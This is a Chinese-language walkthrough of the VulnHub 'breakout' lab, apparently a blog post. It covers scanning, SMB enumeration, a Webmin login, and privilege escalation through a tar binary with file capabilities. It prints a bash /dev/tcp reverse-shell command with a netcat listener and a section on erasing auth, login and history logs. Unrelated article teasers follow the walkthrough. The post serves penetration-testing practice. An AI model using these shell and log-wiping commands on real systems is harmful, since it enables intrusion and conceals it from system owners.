vulnhub靶场之breakout

server/2024/11/26 8:24:22/

empire靶场2

前言

靶机:breakout

攻击:kali

续接上个靶场empire1的继续学习

主机发现

使用arp-scan扫描或者直接查看虚拟机的ip地址

在这里插入图片描述

信息收集

使用nmap扫描

在这里插入图片描述

  1. 端口80apache 2.4.51
  2. 开启smb服务的两个端口139、445,版本4.6.2
  3. 两个http服务采用miniserv(webmin)
  4. 操作系统为linux 4.x或5.x
访问查看

查看80端口网站信息,是搭建apache后的默认页面

在这里插入图片描述

查看页面源码,再最后面发现一串加密的字符。

在这里插入图片描述

进行分析解密

在这里插入图片描述

在这里插入图片描述

查看10000端口的网站信息,是个登录界面

在这里插入图片描述

查看20000端口网站信息,同样是登录

在这里插入图片描述

扫描网站目录

80端口并无好东西,因为本身就是一个默认的界面

在这里插入图片描述

扫描10000端口

在这里插入图片描述

访问robots.txt发现只有一个根目录,没有价值

扫描20000端口

在这里插入图片描述

打开robots.txt文件同样没有东西

检测smb服务

使用enum4linux工具来查看smb服务的一些信息

enum4linux -a -o 192.168.1.29

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

至此信息收集完毕,尝试进行攻击

小结获取到的信息

  1. 获取到一段加密后的字符.2uqPEfj3D<P'a-3
  2. 从smb获取一个本地用户cyber
  3. 10000和20000端口是登录界面,并是miniweb

漏洞寻找

在10000端口和20000端口的网站尝试万能密码进行测试

输入1' or 1=11' or '1'='1,直接说用户名错误

在这里插入图片描述

在这里插入图片描述

基于前面收集到该端口的信息可以知道,是miniserv,搜索有无默认登录密码

搜索到miniO browser默认账户和密码都是minioadmin并且是管理员权限

进行测试,发现登录变了,不再是用户名错误,而是登录失败,说明有这个用户名

在这里插入图片描述

尝试进行爆破,多次尝试,大概7次左右吧,就被封锁IP,不过大概1分钟后会恢复登录页面

在这里插入图片描述

抓包分析,是根据什么进行封禁的IP地址

发现并无x-forwarded-for类似的http头,说明是通过连接时获取IP的,那么这里无法伪造IP,但是可以通过代理池的方式来绕过这个IP封禁进行爆破

不过因为是相当于内网环境,代理池基本上没用上,所以这里换方法

漏洞利用

之前获取到的一个用户名和一串加密后的字符,尝试登录cyber .2uqPEfj3D<P'a-3

登录成功

在这里插入图片描述

这里可以找到几处利用点,每个功能模块都点击测试一下,有一个文件管理工具,可以上传文件,一个ssh终端,在web页面就可以调用,并且直接连接,可以在文件管理中看到SSH认证的相关文件,在.ssh目录下

并且还有一个命令执行SHELL,不过可以直接连接,就可以暂时不需要

不过还有一个密码更改需要注意,万一有可绕过的业务漏洞呢。不过抓包后发现,是有一个uid,这个是网站自己生成的很长的字符串,不好进行操作

在这里插入图片描述

在这里插入图片描述

功能很多,但是都比不过可以直接使用ssh连接,因为就算是shell成功,也还是当前用户的权限

在这里插入图片描述

在这里插入图片描述

使用ssh连接终端,先查看一些权限问题

在这里插入图片描述

提权

当前文件下有两个文件,并且tar命令竟然在这,而且有执行权限

在这里插入图片描述

既然给出这个命令,说明要么有需要解压的包或压缩的包,反正应该是有信息的

使用compgen -c来查看find命令当前用户可用吗

在这里插入图片描述

使用find尝试搜索关键字flagpass*user*

文件实在太多了,看花眼了,这里可以看到应该是隐藏备份文件,尝试能否访问

在这里插入图片描述

无法直接访问,那么在当前目录下有tar命令,把目标打包到这里,然后解压查看

在这里插入图片描述

在这里插入图片描述

获取到一个密码,不过并不知道是谁的,所以,可以先查看/etc/passwd有哪些用户

在这里插入图片描述

然后可以一个一个的试试

在这里插入图片描述

但是这里还没有输入密码就直接跳出权限错误,而且su是有SUID的,不清楚,不过既然已经进入,直接查看是否可用bash,可用的话,就反弹一个shell,这里不行的话,还可以使用wget进行下载,比如python的等等

当然也可以尝试从网站重新登录,以root的身份,因为在前面查看/etc/passwd的时候,发现cyber是在其中的,说明root也有可能是能够登录网站的

在这里插入图片描述

bash -i >& /dev/tcp/192.168.1.16/9999 0>&1	在靶机执行
nc -lvvp 9999	在kali执行

在这里插入图片描述

提权到root成功

在这里插入图片描述

清除痕迹

删除auth
echo > auth.log
删除btmp
echo > btmp
删除wtmp
echo > wtmp
删除lastlog
echo > lastlog
删除命令的历史记录
history -r

暂时在/var/log目录下无其他日志文件

总结

  1. 养成经常看页面源代码的习惯

  2. 涉及到简单的密码破解,可以增长记忆,这里是brain

  3. enum4linux的使用,可以清晰的看到SMB的好多内容

  4. 结合收集到的所有信息进行尝试,这里只给出网站,并且可登录,就根据自己的信息去尝试

  5. 对于登录到网站系统中的时候,对于网站的功能,都点击进行测试,比如有修改密码等操作时,就可以抓包分析

  6. 妥善使用compgen -c来获取当前用户的可用命令,配合grep进行筛选

  7. 记得一些敏感文件的常用关键字,如密码,可能文件名中就有pass

  8. 命令getcap的使用,附在最后吧

  9. 反弹shell的时候,反弹就是对方主动来连接你

    bash -i >& /dev/tcp/ip/port 0>&1

getcap是一个用于查看文件的能力(capabilities)的命令。在 Linux 系统中,文件能力是一种细粒度的权限机制,它允许对程序的权限进行更灵活的控制,而不是仅仅依赖传统的用户 / 组 / 其他(ugo)权限位。

  • cap_dac_read_search是一种文件能力。具体来说,cap_dac_read_search能力允许一个进程绕过文件读取、目录读取和可执行文件搜索的常规文件权限检查。
  • =ep是一种设置权限的方式。e表示启用(effective),p表示许可(permitted)。这意味着为tar程序设置了cap_dac_read_search能力,并且这个能力在程序执行时是有效的和被许可的。这样,tar程序在执行某些操作时(如读取文件和搜索目录)可以绕过传统的基于用户 / 组 / 其他的访问控制(DAC - Discretionary Access Control)权限检查。

http://www.ppmy.cn/server/145006.html

相关文章

day23|leetCode 39. 组合总和 , 40.组合总和II , 131.分割回文串

5.组合总和 给你一个 无重复元素 的整数数组 candidates 和一个目标整数 target &#xff0c;找出 candidates 中可以使数字和为目标数 target 的 所有 不同组合 &#xff0c;并以列表形式返回。你可以按 任意顺序 返回这些组合。 candidates 中的 同一个 数字可以 无限制重复被…

跨平台应用开发框架(1)----Qt(组件篇)

目录 1.Qt 1.Qt 的主要特点 2.Qt的使用场景 3.Qt的版本 2.QtSDK 1.Qt SDK 的组成部分 2.安装 Qt SDK 3.Qt SDK 的优势 3.Qt初识 1.快速上手 widget.cpp mian.cpp widget.h Helloworld.pro 2.对象树 3.坐标系 4.信号和槽 1. 信号和槽的基本概念 2. 信号和槽的…

微服务系统架构图

微服务架构是一种将单一应用程序开发为一组小型服务的架构风格。每个服务都在自己的进程中运行&#xff0c;它们之间采用轻量级的通信机制&#xff08;如 HTTP/REST 或消息队列&#xff09;进行相互协作。以下是关于微服务系统架构的简要介绍&#xff1a;一、核心特点独立部署 …

springboot欢迪迈手机商城设计与开发论文

摘 要 现代经济快节奏发展以及不断完善升级的信息化技术&#xff0c;让传统数据信息的管理升级为软件存储&#xff0c;归纳&#xff0c;集中处理数据信息的管理方式。本欢迪迈手机商城就是在这样的大环境下诞生&#xff0c;其可以帮助管理者在短时间内处理完毕庞大的数据信息&…

DataGrip 连接 Redis、TongRDS

连接 Redis 或 TongRDS 有些旧版本 没有 redis 驱动用不了 1&#xff09;选择驱动 2&#xff09;添加连接信息 3&#xff09;测试连接 4&#xff09;保存连接 5&#xff09;使用案例

如何在 Eclipse 中调试ABAP程序

原文链接&#xff1a;Debugging an ABAP Program ADT 中的调试器是一个重要的诊断工具&#xff0c;可用于分析 ABAP 应用程序。 使用调试器&#xff0c;您可以通过在运行时 Debug 单步执行&#xff08;F5&#xff09;程序来确定程序无法正常工作的原因。这使您可以看到正在执…

wordpress获取文章总数、分类总数、tag总数等

在制作wordpress模板的时候会要调用网站的文章总数分类总数tag总数等这个数值&#xff0c;如果直接用count查询数据库那就太过分了。好在wordpress内置了一些标签可以直接获取到这些数值&#xff0c;本文整理了一些常用的wordpress网站总数标签。 文章总数 <?php $count_…

位图与布隆过滤器

欢迎拜访&#xff1a; 羑悻的小杀马特.-CSDN博客 本篇主题&#xff1a;位图与布隆过滤器 制作日期&#xff1a;2024.11.25 隶属专栏&#xff1a;c的不归之路 ------ ->欢迎阅读 欢迎阅读 欢迎阅读 欢迎阅读 <------- 目录…